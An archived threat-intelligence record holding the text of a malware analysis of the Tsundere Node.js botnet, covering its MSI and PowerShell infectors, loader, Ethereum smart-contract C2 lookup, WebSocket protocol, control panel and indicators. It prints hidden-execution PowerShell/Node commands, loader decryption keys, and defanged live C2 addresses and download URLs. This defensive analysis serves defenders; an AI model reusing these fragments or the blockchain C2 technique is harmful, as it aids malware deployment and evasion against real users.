{
	"id": "a191d082-0c70-4b93-8f1d-68127ef5b61f",
	"created_at": "2026-04-06T00:09:54.69741Z",
	"updated_at": "2026-04-10T03:20:39.255392Z",
	"deleted_at": null,
	"sha1_hash": "9e5ca6adb9428a68f4b9e3a7e53ed64d39016b1a",
	"title": "Blockchain and Node.js abused by Tsundere: an emerging botnet",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1864807,
	"plain_text": "Blockchain and Node.js abused by Tsundere: an emerging botnet\r\nBy Lisandro Ubiedo\r\nPublished: 2025-11-20 · Archived: 2026-04-05 22:46:19 UTC\r\nIntroduction\r\nTsundere is a new botnet, discovered by our Kaspersky GReAT around mid-2025. We have correlated this threat\r\nwith previous reports from October 2024 that reveal code similarities, as well as the use of the same C2 retrieval\r\nmethod and wallet. In that instance, the threat actor created malicious Node.js packages and used the Node\r\nPackage Manager (npm) to deliver the payload. The packages were named similarly to popular packages,\r\nemploying a technique known as typosquatting. The threat actor targeted libraries such as Puppeteer, Bignum.js,\r\nand various cryptocurrency packages, resulting in 287 identified malware packages. This supply chain attack\r\naffected Windows, Linux, and macOS users, but it was short-lived, as the packages were removed and the threat\r\nactor abandoned this infection method after being detected.\r\nThe threat actor resurfaced around July 2025 with a new threat. We have dubbed it the Tsundere bot after its C2\r\npanel. This botnet is currently expanding and poses an active threat to Windows users.\r\nInitial infection\r\nCurrently, there is no conclusive evidence on how the Tsundere bot implants are being spread. However, in one\r\ndocumented case, the implant was installed via a Remote Monitoring and Management (RMM) tool, which\r\ndownloaded a file named pdf.msi from a compromised website. In other instances, the sample names suggest\r\nthat the implants are being disseminated using the lure of popular Windows games, particularly first-person\r\nshooters. 
The samples found in the wild have names such as “valorant”, “cs2”, or “r6x”, which appear to be\r\nattempts to capitalize on the popularity of these games among piracy communities.\r\nMalware implants\r\nAccording to the C2 panel, there are two distinct formats for spreading the implant: via an MSI installer and via a\r\nPowerShell script. Implants are automatically generated by the C2 panel (as described in the Infrastructure\r\nsection).\r\nMSI installer\r\nThe MSI installer was often disguised as a fake installer for popular games and other software to lure new victims.\r\nNotably, at the time of our research, it had a very low detection rate.\r\nThe installer contains a list of data and JavaScript files that are updated with each new build, as well as the\r\nnecessary Node.js executables to run these scripts. The following is a list of files included in the sample:\r\nhttps://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/\r\nPage 1 of 16\n\nnodejs/B4jHWzJnlABB2B7\r\nnodejs/UYE20NBBzyFhqAQ.js\r\nnodejs/79juqlY2mETeQOc\r\nnodejs/thoJahgqObmWWA2\r\nnodejs/node.exe\r\nnodejs/npm.cmd\r\nnodejs/npx.cmd\r\nThe last three files in the list are legitimate Node.js files. 
They are installed alongside the malicious artifacts in the\r\nuser’s AppData\\Local\\nodejs directory.\r\nAn examination of the CustomAction table reveals the process by which Windows Installer executes the malware\r\nand installs the Tsundere bot:\r\nRunModulesSetup 1058    NodeDir powershell -WindowStyle Hidden -NoLogo -enc\r\nJABuAG[...]ACkAOwAiAA==\r\nAfter Base64 decoding, the command appears as follows:\r\n$nodePath = \"$env:LOCALAPPDATA\\nodejs\\node.exe\";\r\n\u0026 $nodePath -e \"const { spawn } = require('child_process'); spawn(process.env.LOCALAPPDATA +\r\n'\\\\nodejs\\\\node.exe', ['B4jHWzJnlABB2B7'], { detached: true, stdio: 'ignore', windowsHide: true, cwd:\r\n__dirname }).unref();\"\r\nThis will execute Node.js code that spawns a new Node.js process, which runs the loader JavaScript code (in this\r\ncase, B4jHWzJnlABB2B7). The resulting child process runs in the background, remaining hidden from the user.\r\nLoader script\r\nThe loader script is responsible for ensuring the correct decryption and execution of the main bot script, which\r\nhandles npm unpackaging and configuration. Although the loader code, like the code for the other JavaScript\r\nfiles, is obfuscated, it can be deobfuscated using open-source tools. 
Once executed, the loader attempts to locate\r\nthe unpackaging script and configuration for the Tsundere bot, decrypts them using the AES-256-CBC\r\ncryptographic algorithm with a build-specific key and IV, and saves the decrypted files under different filenames.\r\n  encScriptPath = 'thoJahgqObmWWA2',\r\n  encConfigPath = '79juqlY2mETeQOc',\r\n  decScript = 'uB39hFJ6YS8L2Fd',\r\n  decConfig = '9s9IxB5AbDj4Pmw',\r\n  keyBase64 = '2l+jfiPEJufKA1bmMTesfxcBmQwFmmamIGM0b4YfkPQ=',\r\n  ivBase64 = 'NxrqwWI+zQB+XL4+I/042A==',\r\n[...]\r\n    const h = path.dirname(encScriptPath),\r\n      i = path.join(h, decScript),\r\n      j = path.join(h, decConfig)\r\n    decryptFile(encScriptPath, i, key, iv)\r\n    decryptFile(encConfigPath, j, key, iv)\r\nThe configuration file is a JSON that defines a directory and file structure, as well as file contents, which the\r\nmalware will recreate. The malware author refers to this file as “config”, but its primary purpose is to package and\r\ndeploy the Node.js package manager (npm) without requiring manual installation or downloading. The\r\nunpackaging script is responsible for recreating this structure, including the node_modules directory with all its\r\nlibraries, which contains packages necessary for the malware to run.\r\nWith the environment now set up, the malware proceeds to install three packages to the node_modules directory\r\nusing npm:\r\nws: a WebSocket networking library\r\nethers: a library for communicating with Ethereum\r\npm2: a Node.js process management tool\r\nLoader script installing the necessary toolset for Tsundere persistence and execution\r\nThe pm2 package is installed to launch the bot and ensure it remains active. 
Additionally,\r\npm2 helps achieve persistence on the system by writing to the registry and configuring itself to restart the process\r\nupon login.\r\nPowerShell infector\r\nThe PowerShell version of the infector operates in a more compact and simplified manner. Instead of utilizing a\r\nconfiguration file and an unpacker, as done with the MSI installer, it downloads the ZIP file node-v18.17.0-win-x64.zip\r\nfrom the official Node.js website nodejs[.]org and extracts it to the AppData\\Local\\NodeJS\r\ndirectory, ultimately deploying Node.js on the targeted device. The infector then uses the AES-256-CBC algorithm\r\nto decrypt two large hexadecimal-encoded variables, which correspond to the bot script and a persistence script.\r\nThese decrypted files, along with a package.json file, are written to disk. The package.json file contains\r\ninformation about the malicious Node.js package, as well as the necessary libraries to be installed, including the\r\nws and ethers packages. Finally, the infector runs both scripts, starting with the persistence script, followed by\r\nthe bot script.\r\nThe PowerShell infector creates a package file with the implant dependencies\r\nPersistence is achieved through the same mechanism observed in the MSI installer: the script creates a value in the\r\nHKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key that points to itself. It then overwrites\r\nitself with a new script that is Base64 decoded. This new script is responsible for ensuring the bot is executed on\r\neach login by spawning a new instance of the bot.\r\nTsundere bot\r\nWe will now delve into the Tsundere bot, examining its communication with the command-and-control (C2)\r\nserver and its primary functionality.\r\nC2 address retrieval\r\nWeb3 contracts, also known as smart contracts, are deployed on a blockchain via transactions from a wallet. 
These\r\ncontracts can store data in variables, which can be modified by functions defined within the contract. In this case,\r\nthe Tsundere botnet utilizes the Ethereum blockchain, where a method named setString(string _str) is\r\ndefined to modify the state variable param1, allowing it to store a string. The string stored in param1 is used by\r\nthe Tsundere botnet administrators to store new WebSocket C2 servers, which can be rotated at will; each update\r\nis immutable once written to the Ethereum blockchain.\r\nThe Tsundere botnet relies on two constant points of reference on the Ethereum blockchain:\r\nWallet: 0x73625B6cdFECC81A4899D221C732E1f73e504a32\r\nContract: 0xa1b40044EBc2794f207D45143Bd82a1B86156c6b\r\nIn order to change the C2 server, the Tsundere botnet makes a transaction to update the state variable with a new\r\naddress. Below is a transaction made on August 19, 2025, with a value of 0 ETH, which updates the address.\r\nSmart contract containing the Tsundere botnet WebSocket C2\r\nThe state variable has a fixed length of 32 bytes, and a string of 24 bytes (see item [2] in the previous image) is\r\nstored within it. When this string is converted from hexadecimal to ASCII, it reveals the new WebSocket C2\r\nserver address: ws[:]//185.28.119[.]179:1234.\r\nTo obtain the C2 address, the bot contacts various public endpoints that provide remote procedure call (RPC)\r\nAPIs, allowing it to interact with Ethereum blockchain nodes. At the start of the script, the bot calls a function\r\nnamed fetchAndUpdateIP, which iterates through a list of RPC providers. 
For each provider, it checks the\r\ntransactions associated with the contract address and wallet owner, and then retrieves the string from the state\r\nvariable containing the WebSocket address, as previously observed.\r\nMalware code for retrieval of C2 from the smart contract\r\nThe Tsundere bot verifies that the C2 address starts with either ws:// or wss:// to ensure it is a valid\r\nWebSocket URL, and then sets the obtained string as the server URL. But before using this new URL, the bot first\r\nchecks the system locale by retrieving the culture name of the machine to avoid infecting systems in the CIS\r\nregion. If the system is not in the CIS region, the bot establishes a connection to the server via a WebSocket,\r\nsetting up the necessary handlers for receiving, sending, and managing connection states, such as errors and closed\r\nsockets.\r\nBot handlers for communication\r\nCommunication\r\nThe communication flow between the client (Tsundere bot) and the server (WebSocket C2) is as follows:\r\n1. The Tsundere bot establishes a WebSocket connection with the retrieved C2 address.\r\n2. An AES key is transmitted immediately after the connection is established.\r\n3. The bot sends an empty string to confirm receipt of the key.\r\n4. The server then sends an IV, enabling the use of encrypted communication from that point on.\r\nEncryption is required for all subsequent communication.\r\n5. The bot transmits the OS information of the infected machine, including the MAC address, total memory,\r\nGPU information, and other details. This information is also used to generate a unique identifier (UUID).\r\n6. The C2 server responds with a JSON object, acknowledging the connection and confirming the bot’s\r\npresence.\r\n7. 
With the connection established, the client and server can exchange information freely.\r\n7.1 To maintain the connection, keep-alive messages are sent every minute using ping/pong\r\nmessages.\r\n7.2 The bot sends encrypted responses as part of the ping/pong messages, ensuring continuous\r\ncommunication.\r\nTsundere communication process with the C2 via WebSockets\r\nThe connections are not authenticated through any additional means, making it possible for a fake client to\r\nestablish a connection.\r\nAs previously mentioned, the client sends an encrypted ping message to the C2 server every minute, which returns\r\na pong message. This ping-pong exchange serves as a mechanism for the C2 panel to maintain a list of currently\r\nactive bots.\r\nFunctionality\r\nThe Tsundere bot is designed to allow the C2 server to send dynamic JavaScript code. When the C2 server sends a\r\nmessage with ID=1 to the bot, the message is evaluated as a new function and then executed. 
The result of this\r\noperation is sent back to the server via a custom function named serverSend, which is responsible for\r\ntransmitting the result as a JSON object, encrypted for secure communication.\r\nTsundere bot evaluation code once functions are received from the C2\r\nThe ability to evaluate code makes the Tsundere bot relatively simple, but it also provides flexibility and\r\ndynamism, allowing the botnet administrators to adapt it to a wide range of actions.\r\nHowever, during our observation period, we did not receive any commands or functions from the C2 server,\r\npossibly because the newly connected bot needed to be requested by other threat actors through the botnet panel\r\nbefore it could be utilized.\r\nInfrastructure\r\nThe Tsundere bot utilizes WebSocket as its primary protocol for establishing connections with the C2 server. As\r\nmentioned earlier, at the time of writing, the malware was communicating with the WebSocket server located at\r\n185.28.119[.]179, and our tests indicated that it was responding positively to bot connections.\r\nThe following table lists the IP addresses and ports extracted from the provided list of URLs:\r\nIP | Port | First seen (contract update) | ASN\r\n185.28.119[.]179 | 1234 | 2025-08-19 | AS62005\r\n196.251.72[.]192 | 1234 | 2025-08-03 | AS401120\r\n103.246.145[.]201 | 1234 | 2025-07-14 | AS211381\r\n193.24.123[.]68 | 3011 | 2025-06-21 | AS200593\r\n62.60.226[.]179 | 3001 | 2025-05-04 | AS214351\r\nMarketplace and control panel\r\nNo business is complete without a marketplace, and similarly, no botnet is complete without a control panel. 
The\r\nTsundere botnet has both a marketplace and a control panel, which are integrated into the same frontend.\r\nTsundere botnet panel login\r\nThe notable aspect of Tsundere’s control panel, dubbed “Tsundere Netto” (version 2.4.4), is that it has an open\r\nregistration system. Any user who accesses the login form can register and gain access to the panel, which features\r\nvarious tabs:\r\nBots: a dashboard displaying the number of bots under the user’s control\r\nSettings: user settings and administrative functions\r\nBuild: if the user has an active license, they can create new bots using the two previously mentioned\r\nmethodologies (MSI or PowerShell)\r\nMarket: this is the most interesting aspect of the panel, as it allows users to promote their individual bots\r\nand offer various services and functionalities to other threat actors. Each build can create a bot that\r\nperforms a specific set of actions, which can then be offered to others\r\nMonero wallet: a wallet service that enables users to make deposits or withdrawals\r\nSocks proxy: a feature that allows users to utilize their bots as proxies for their traffic\r\nTsundere botnet control panel, building system and market\r\nEach build generates a unique build ID, which is embedded in the implant and sent to the C2 server upon\r\ninfection. This build ID can be linked to the user who created it. 
According to our research and analysis of other\r\nURLs found in the wild, builds are created through the panel and can be downloaded via the URL:\r\nhxxps://idk.1f2e[REDACTED]07a4[.]net/api/builds/{BUILD-ID}.msi.\r\nAt the time of writing, the panel typically has between 90 and 115 bots connected to the C2 server at any\r\ngiven time.\r\nAttribution\r\nBased on the text found in the implants, we can conclude with high confidence that the threat actor behind the\r\nTsundere botnet is likely Russian-speaking. The use of the Russian language in the implants is consistent with\r\nprevious attacks attributed to the same threat actor.\r\nRussian being used throughout the code\r\nFurthermore, our analysis suggests a connection between the Tsundere botnet and the 123 Stealer, a C++-based\r\nstealer available on the shadow market for $120 per month. This connection is based on the fact that both panels\r\nshare the same server. Notably, the main domain serves as the frontend for the 123 Stealer panel, while the\r\nsubdomain “idk.” is used for the Tsundere botnet panel.\r\n123 Stealer C2 panel sharing Tsundere’s infrastructure and showcasing its author\r\nBy examining the available evidence, we can link both threats to a Russian-speaking threat actor known as\r\n“koneko”. Koneko was previously active on a dark web forum, where they promoted the 123 Stealer, as well as\r\nother malware, including a backdoor. Although our analysis of the backdoor revealed that it was not directly\r\nrelated to Tsundere, it shared similarities with the Tsundere botnet in that it was written in Node.js and used\r\nPowerShell or MSI as infectors. 
Before the dark web forum was seized and shut down, koneko’s profile featured\r\nthe title “node malware senior”, further suggesting their expertise in Node.js-based malware.\r\nConclusion\r\nThe Tsundere botnet represents a renewed effort by a presumably identified threat actor to revamp their toolset.\r\nThe Node.js-based bot is an evolution of an attack discovered in October of last year, and it now features a new\r\nstrategy and even a new business model. Infections can occur through MSI and PowerShell files, which provides\r\nflexibility in terms of disguising installers, using phishing as a point of entry, or integrating with other attack\r\nmechanisms, making it an even more formidable threat.\r\nAdditionally, the botnet leverages a technique that is gaining popularity: utilizing web3 contracts, also known as\r\n“smart contracts”, to host command-and-control (C2) addresses, which enhances the resilience of the botnet\r\ninfrastructure. The botnet’s possible author, koneko, is also involved in peddling other threats, such as the 123\r\nStealer, which suggests that the threat is likely to escalate rather than diminish in the coming months. 
As a result,\r\nit is essential to closely monitor this threat and be vigilant for related threats that may emerge in the near future.\r\nIndicators of compromise\r\nMore IoCs related to this threat are available to customers of the Kaspersky Intelligence Reporting Service.\r\nContact: intelreports@kaspersky.com.\r\nFile paths\r\n%APPDATA%\\Local\\NodeJS\r\nDomains and IPs\r\nws://185.28.119[.]179:1234\r\nws://196.251.72[.]192:1234\r\nws://103.246.145[.]201:1234\r\nws://193.24.123[.]68:3011\r\nws://62.60.226[.]179:3001\r\nCryptocurrency wallets\r\nNote: These are wallets that have changed the C2 address in the smart contract since it was created.\r\nSource: https://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://securelist.com/tsundere-node-js-botnet-uses-ethereum-blockchain/117979/"
	],
	"report_names": [
		"117979"
	],
	"threat_actors": [],
	"ts_created_at": 1775434194,
	"ts_updated_at": 1775791239,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9e5ca6adb9428a68f4b9e3a7e53ed64d39016b1a.pdf",
		"text": "https://archive.orkl.eu/9e5ca6adb9428a68f4b9e3a7e53ed64d39016b1a.txt",
		"img": "https://archive.orkl.eu/9e5ca6adb9428a68f4b9e3a7e53ed64d39016b1a.jpg"
	}
}